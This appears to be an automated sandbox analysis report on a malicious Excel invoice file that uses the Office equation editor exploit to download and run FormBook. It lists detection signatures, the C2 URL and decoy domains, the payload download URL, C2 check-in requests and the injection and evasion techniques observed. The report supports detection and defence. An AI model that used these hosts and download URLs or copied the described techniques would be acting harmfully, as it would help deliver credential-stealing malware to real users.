Windows Analysis Report
DL03327INV.xlsx

Overview

General Information

Sample Name: DL03327INV.xlsx
Analysis ID: 626601
MD5: 5b4a67ac532a5d8900b815144f0fb845
SHA1: 6da306004e084780e9f57f3702a5ec22e72fff6c
SHA256: 98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
Tags: VelvetSweatshopxlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}
Source: DL03327INV.xlsx Virustotal: Detection: 38%
Source: DL03327INV.xlsx ReversingLabs: Detection: 26%
Source: Yara match File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: www.arjimni.com/nc39/ Avira URL Cloud: Label: malware
Source: http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh Avira URL Cloud: Label: malware
Source: http://104.168.33.31/75/vbc.exe Avira URL Cloud: Label: malware
Source: http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Source: 6.2.yldnat.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.yldnat.exe.120000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.EQNEDT32.EXE.6af7ba.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.yldnat.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.168.33.31 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D052D ShellExecuteW,ExitProcess, 2_2_036D052D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0494 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0494
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D03EF ExitProcess, 2_2_036D03EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0552 ExitProcess, 2_2_036D0552
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D04AE URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04AE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0424 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0424
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0408 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0408
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0518 ShellExecuteW,ExitProcess, 2_2_036D0518
Source: global traffic DNS query: name: www.arjimni.com
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

Networking

Source: C:\Windows\explorer.exe Network Connect: 23.81.214.26 80
Source: C:\Windows\explorer.exe Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe Network Connect: 164.155.217.57 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.212 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Malware configuration extractor URLs: www.arjimni.com/nc39/
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SEA-10US
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.54.117.212
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:19:31 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:36:08 GMTETag: "4065c-5dee1677234a5"Accept-Ranges: bytesContent-Length: 263772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 13:20:49 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: close Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 13:21:05 GMTContent-Type: text/htmlContent-Length: 466Connection: close Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comI equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000003.965529883.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.971155692.0000000000614000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.31/75/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.31/75/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.31/75/vbc.exej
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf
Source: unknown DNS traffic detected: queries for: www.arjimni.com
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
Source: global traffic HTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
